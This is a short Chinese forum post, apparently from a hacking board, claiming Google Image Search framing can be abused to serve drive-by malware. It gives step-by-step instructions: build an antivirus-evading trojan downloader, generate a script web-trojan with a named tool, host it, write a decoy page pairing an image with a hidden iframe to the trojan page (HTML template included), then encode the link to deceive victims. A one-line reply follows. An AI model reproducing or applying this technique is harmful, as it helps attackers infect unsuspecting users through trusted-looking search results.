谷歌图片搜索存在挂马漏洞.
谷歌图片搜索 是将图片来源的页面嵌套到自己的页面. 其原因是谷歌图片搜索直接将图片来源网页框架嵌入谷歌的图片搜索结果页面 没有对这个图片来源网址做任何安全性校验就显示出来.这种挂马的好处就是迷惑性非常强. 好比你相信大型百货公司不会销售假货一样.
接下去制作方法. 第一步:先制作一个免杀的木马下载者服务端(程序运行后会从指定的网站下载大量木马)之后用《终极网马生成器》生成脚本网马 生成的网马传到指定的网站空间里.
第二步:制作伪装网页 由于利用的图片搜索页面 打开的页面一定要有图片.事先制作一个简单的网页 既有图片又有挂马代码 代码如下
<html>
<head.
<title>为标题1</title>
</head>
<body>
<img alt=" "src="伪装的图片链接地址"/> <!——代码的作用是伪装图片地址——>
<iframe src="木马网页的地址"/><!——代码的作用是嵌入挂马网页——>
<body>
<html>
将上诉代码写进记事本中另存为xxx.htm 之后上传到指定的网页空间 这里假设地址是www.xxx.com/1.htm]http://http.www.xxx.com/1.htm 不之情人就会打开这个页面中招 警惕的人不会直接打开一个陌生的链接的
第三步:进行欺骗攻击. 用URL进行加密处理. 把http://www.xxx.com/1.htm加密成字符串.
这样看上去就OK拉. 如果点击了 就会激活挂马网页.
仅供参考.
SF- -. 0.0我不点不认识的网址 晕 这~~~~~ ˉ- ˉ!...
页:
[1]